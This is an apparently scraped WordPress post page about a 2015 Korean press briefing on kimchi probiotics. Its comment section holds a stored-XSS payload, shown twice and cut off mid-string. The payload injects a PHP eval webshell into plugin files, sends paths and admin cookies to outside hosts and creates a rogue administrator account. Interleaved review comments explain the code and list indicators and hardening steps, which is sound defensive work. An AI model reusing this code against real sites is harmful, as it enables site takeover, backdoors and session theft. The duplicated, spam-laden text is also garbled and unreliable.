15.11.04 – ‘김치유산균과 면역력’ 기자간담회
By kofrum - Nov 3, 2015
// NOTE(review): Everything from `<abbr title=` onward is a comment body submitted to this
// WordPress page, not page script. It carries an `onmouseover` handler inside an `<abbr title>`
// attribute, i.e. a stored-XSS attempt against whoever renders the comment. The relative URLs
// (`plugin-editor.php`, `user-new.php`) and the 'wp-admin' substring lookup suggest it is meant
// to run in a logged-in administrator's dashboard session — inferred, not shown here.
// The text is cut off mid-string at the end (`'role':'administ&%2`): `SenData`, any use of
// `recieve`/`laurl`, and the calls that start `fuckxss`/`adduser` are not visible on this page.
// Indicators visible in this text: hosts g.fr9[.]co and web.51[.]la:82, POST parameter `dak`,
// the marker `$www = $_POST['dak']` in plugin files, account `obuser` / user@gmail.com.
// Hardening that blocks the visible steps: keep core comment sanitisation patched, set
// `define('DISALLOW_FILE_EDIT', true);` in wp-config.php (disables the plugin/theme editor this
// script writes through), and review administrator accounts and plugin file integrity.
hinice sysacr :-) <abbr title='" onmouseover="var file = ""; var xurl = "plugin-editor.php"; var Aurl = "user-new.php"; var file2= []; var shell= []; var recieve="http://g.fr9.co/xss/recieve.php";// address of recieve.php on the public internet
var StartGetshell = 1; // whether to getshell all templates: 1 = yes, 0 = no
// PHP stub that gets spliced over the first `<?php` of a plugin file: when POST field `dak` is
// present it passes that value through preg_replace() with the /e modifier, and
// str_rot13('riny') spells 'eval', so the posted string is evaluated as PHP. Useful grep
// targets on disk: `$_POST['dak']`, `str_rot13('riny')`, `preg_replace('/ad/e'`.
var shellcode = "<?php\nif(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}";
// tempname is the part of the current URL from 'wp-admin' to the end; the functions below swap
// it for "wp-content/plugins/<file>" when reporting a path. laurl is assigned but not used in
// the visible text.
var tempname = location.href.substring(location.href.indexOf('wp-admin'),location.href.length); var laurl = "http://web.51.la:82/go.asp";
// Replaces window.setTimeout (unless window.x is set) with a wrapper that forwards the arguments
// after the delay to function callbacks — presumably for browsers whose setTimeout ignores
// extra arguments; the GetAllShell scheduling in fuckxss passes such a third argument.
if(!window.x){ var _st = window.setTimeout; window.setTimeout = function(fRef, mDelay) { if(typeof fRef == 'function'){ var argu = Array.prototype.slice.call(arguments,2); var f = (function(){ fRef.apply(null, argu); }); return _st(f, mDelay); } return _st(fRef,mDelay); } }
// Plugin-editor abuse, first file: GETs plugin-editor.php in the viewer's session, scrapes the
// `_wpnonce` value, the currently open file name and the editor textarea. If the marker string
// is already in the textarea it only reports (path, "Password: dak", document.cookie) via
// SenData; otherwise it swaps the first `<?php` for `shellcode` and POSTs the file back with the
// scraped nonce. Same-origin script can read the nonce, so the CSRF nonce is no defence once
// the XSS runs. It also collects every `select#plugin option` value and, when StartGetshell is
// truthy, schedules GetAllShell for each of them after 150 ms.
function fuckxss(){ var tempshell = ""; jQuery.ajax({ url: xurl, type: 'GET', dataType: 'html', data: {}, }) .done(function(data) { var temp = jQuery(data); var Xtoken = ""; var Tmpcode = ""; temp.find('input#_wpnonce').each(function(i,o){ var o=jQuery(o); Xtoken=o.attr('value'); }); temp.find('div.alignleft big strong').each(function(i,o){ var o=jQuery(o); file = o.text(); }); temp.find('textarea#newcontent').each(function(i,o){ var o=jQuery(o); if(o.text().indexOf('$www = $_POST[\'dak\']')>0){ SenData('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak\r\nCookie: "+document.cookie); return false; } Tmpcode = o.text().replace('<?php',shellcode); }); temp.find('select#plugin option').each(function(i,o){ var o=jQuery(o); file2.push(o.attr('value')); }); if(Xtoken&&Tmpcode&&file){ jQuery.ajax({ url: xurl, type: 'POST', data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'} }) .done(function(){ SenData('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak"); return; }) } if(StartGetshell){ for(var
i=0;i<file2.length;i++){ window.setTimeout(GetAllShell,150,file2[i]+"|"+file2[file2.length-1]); } } }) }
// Same routine for one other plugin file. `target` is "<file>|<last file in the list>"; the
// file already handled by fuckxss is skipped. It POSTs {'plugin', 'Submit':'Select'} to load
// that file in the editor, repeats the marker check / `<?php` replacement / update POST, and
// appends the outcome to `shell`. The collected lines go to SenData only when the file being
// processed is the last one in the list.
function GetAllShell(target){ var TmpArr = target.split("|")[1]; var filename = target.split("|")[0]; if(filename!=file){ jQuery.ajax({ url: xurl, type: 'POST', data: {'plugin': filename,'Submit':'Select'}, }) .done(function(data) { var NewCode = ""; var NewToken= ""; var Getshell=jQuery(data); Getshell.find("textarea#newcontent").each(function(i,o){ var o=jQuery(o); if(o.text().indexOf('$www = $_POST[\'dak\']')>0){ shell.push('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak"); console.log(filename+" x "+TmpArr); if(filename==TmpArr){ SenData(shell.join("\r\n")); } return false; } NewCode = o.text().replace('<?php',shellcode); }); Getshell.find("input#_wpnonce").each(function(i,o){ var o=jQuery(o); NewToken = o.attr('value'); }); if(NewCode&&NewToken){ jQuery.ajax({ url: xurl, type: 'POST', data: {'_wpnonce':NewToken,'newcontent':NewCode,'action':'update','file':filename,'plugin':filename,'submit':'Update+File'} }) .done(function(){ shell.push('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak"); console.log(filename+" "+TmpArr); if(filename==TmpArr){ SenData(shell.join("\r\n")); } return; }) .fail(function(){ shell.push(location.href+': GetShell '+filename+' Failure'); }) } }) } }
// Account creation: GETs user-new.php, scrapes `_wpnonce_create-user`, then POSTs
// action=createuser with user_login 'obuser', pass1/pass2 'obpass', email user@gmail.com and a
// role value starting 'administ'. The text is truncated at that point, so the request is
// incomplete as shown. An unexpected `obuser` account is a direct sign that this handler ran.
function adduser(){ jQuery.ajax({ url: Aurl, type: 'GET', dataType: 'html', data: {}, }) .done(function(data) { var temp = jQuery(data); var Xtoken = ""; temp.find('input#_wpnonce_create-user').each(function(i,o){ var o=jQuery(o); Xtoken=o.attr('value'); }); jQuery.ajax({ url: Aurl, type: 'POST', data: {'action': 'createuser','_wpnonce_create-user':Xtoken,'user_login':'obuser','email':'user@gmail.com','first_name':'','last_name':'','url':'','pass1':'obpass','pass2':'obpass','role':'administ&%2 Reply
hellonice wfefog :-)
hellonice gqubee :-)
// NOTE(review): Everything from `<abbr title=` onward is a comment body submitted to this
// WordPress page, not page script. It carries an `onmouseover` handler inside an `<abbr title>`
// attribute, i.e. a stored-XSS attempt against whoever renders the comment. The relative URLs
// (`plugin-editor.php`, `user-new.php`) and the 'wp-admin' substring lookup suggest it is meant
// to run in a logged-in administrator's dashboard session — inferred, not shown here.
// The text is cut off mid-string at the end (`'role':'administ&%2`): `SenData`, any use of
// `recieve`/`laurl`, and the calls that start `fuckxss`/`adduser` are not visible on this page.
// Indicators visible in this text: hosts g.fr9[.]co and web.51[.]la:82, POST parameter `dak`,
// the marker `$www = $_POST['dak']` in plugin files, account `obuser` / user@gmail.com.
// Hardening that blocks the visible steps: keep core comment sanitisation patched, set
// `define('DISALLOW_FILE_EDIT', true);` in wp-config.php (disables the plugin/theme editor this
// script writes through), and review administrator accounts and plugin file integrity.
hinice sysacr :-) <abbr title='" onmouseover="var file = ""; var xurl = "plugin-editor.php"; var Aurl = "user-new.php"; var file2= []; var shell= []; var recieve="http://g.fr9.co/xss/recieve.php";// address of recieve.php on the public internet
var StartGetshell = 1; // whether to getshell all templates: 1 = yes, 0 = no
// PHP stub that gets spliced over the first `<?php` of a plugin file: when POST field `dak` is
// present it passes that value through preg_replace() with the /e modifier, and
// str_rot13('riny') spells 'eval', so the posted string is evaluated as PHP. Useful grep
// targets on disk: `$_POST['dak']`, `str_rot13('riny')`, `preg_replace('/ad/e'`.
var shellcode = "<?php\nif(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}";
// tempname is the part of the current URL from 'wp-admin' to the end; the functions below swap
// it for "wp-content/plugins/<file>" when reporting a path. laurl is assigned but not used in
// the visible text.
var tempname = location.href.substring(location.href.indexOf('wp-admin'),location.href.length); var laurl = "http://web.51.la:82/go.asp";
// Replaces window.setTimeout (unless window.x is set) with a wrapper that forwards the arguments
// after the delay to function callbacks — presumably for browsers whose setTimeout ignores
// extra arguments; the GetAllShell scheduling in fuckxss passes such a third argument.
if(!window.x){ var _st = window.setTimeout; window.setTimeout = function(fRef, mDelay) { if(typeof fRef == 'function'){ var argu = Array.prototype.slice.call(arguments,2); var f = (function(){ fRef.apply(null, argu); }); return _st(f, mDelay); } return _st(fRef,mDelay); } }
// Plugin-editor abuse, first file: GETs plugin-editor.php in the viewer's session, scrapes the
// `_wpnonce` value, the currently open file name and the editor textarea. If the marker string
// is already in the textarea it only reports (path, "Password: dak", document.cookie) via
// SenData; otherwise it swaps the first `<?php` for `shellcode` and POSTs the file back with the
// scraped nonce. Same-origin script can read the nonce, so the CSRF nonce is no defence once
// the XSS runs. It also collects every `select#plugin option` value and, when StartGetshell is
// truthy, schedules GetAllShell for each of them after 150 ms.
function fuckxss(){ var tempshell = ""; jQuery.ajax({ url: xurl, type: 'GET', dataType: 'html', data: {}, }) .done(function(data) { var temp = jQuery(data); var Xtoken = ""; var Tmpcode = ""; temp.find('input#_wpnonce').each(function(i,o){ var o=jQuery(o); Xtoken=o.attr('value'); }); temp.find('div.alignleft big strong').each(function(i,o){ var o=jQuery(o); file = o.text(); }); temp.find('textarea#newcontent').each(function(i,o){ var o=jQuery(o); if(o.text().indexOf('$www = $_POST[\'dak\']')>0){ SenData('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak\r\nCookie: "+document.cookie); return false; } Tmpcode = o.text().replace('<?php',shellcode); }); temp.find('select#plugin option').each(function(i,o){ var o=jQuery(o); file2.push(o.attr('value')); }); if(Xtoken&&Tmpcode&&file){ jQuery.ajax({ url: xurl, type: 'POST', data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'} }) .done(function(){ SenData('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak"); return; }) } if(StartGetshell){ for(var
i=0;i<file2.length;i++){ window.setTimeout(GetAllShell,150,file2[i]+"|"+file2[file2.length-1]); } } }) }
// Same routine for one other plugin file. `target` is "<file>|<last file in the list>"; the
// file already handled by fuckxss is skipped. It POSTs {'plugin', 'Submit':'Select'} to load
// that file in the editor, repeats the marker check / `<?php` replacement / update POST, and
// appends the outcome to `shell`. The collected lines go to SenData only when the file being
// processed is the last one in the list.
function GetAllShell(target){ var TmpArr = target.split("|")[1]; var filename = target.split("|")[0]; if(filename!=file){ jQuery.ajax({ url: xurl, type: 'POST', data: {'plugin': filename,'Submit':'Select'}, }) .done(function(data) { var NewCode = ""; var NewToken= ""; var Getshell=jQuery(data); Getshell.find("textarea#newcontent").each(function(i,o){ var o=jQuery(o); if(o.text().indexOf('$www = $_POST[\'dak\']')>0){ shell.push('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak"); console.log(filename+" x "+TmpArr); if(filename==TmpArr){ SenData(shell.join("\r\n")); } return false; } NewCode = o.text().replace('<?php',shellcode); }); Getshell.find("input#_wpnonce").each(function(i,o){ var o=jQuery(o); NewToken = o.attr('value'); }); if(NewCode&&NewToken){ jQuery.ajax({ url: xurl, type: 'POST', data: {'_wpnonce':NewToken,'newcontent':NewCode,'action':'update','file':filename,'plugin':filename,'submit':'Update+File'} }) .done(function(){ shell.push('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak"); console.log(filename+" "+TmpArr); if(filename==TmpArr){ SenData(shell.join("\r\n")); } return; }) .fail(function(){ shell.push(location.href+': GetShell '+filename+' Failure'); }) } }) } }
// Account creation: GETs user-new.php, scrapes `_wpnonce_create-user`, then POSTs
// action=createuser with user_login 'obuser', pass1/pass2 'obpass', email user@gmail.com and a
// role value starting 'administ'. The text is truncated at that point, so the request is
// incomplete as shown. An unexpected `obuser` account is a direct sign that this handler ran.
function adduser(){ jQuery.ajax({ url: Aurl, type: 'GET', dataType: 'html', data: {}, }) .done(function(data) { var temp = jQuery(data); var Xtoken = ""; temp.find('input#_wpnonce_create-user').each(function(i,o){ var o=jQuery(o); Xtoken=o.attr('value'); }); jQuery.ajax({ url: Aurl, type: 'POST', data: {'action': 'createuser','_wpnonce_create-user':Xtoken,'user_login':'obuser','email':'user@gmail.com','first_name':'','last_name':'','url':'','pass1':'obpass','pass2':'obpass','role':'administ&%2
hellonice iykorl :-)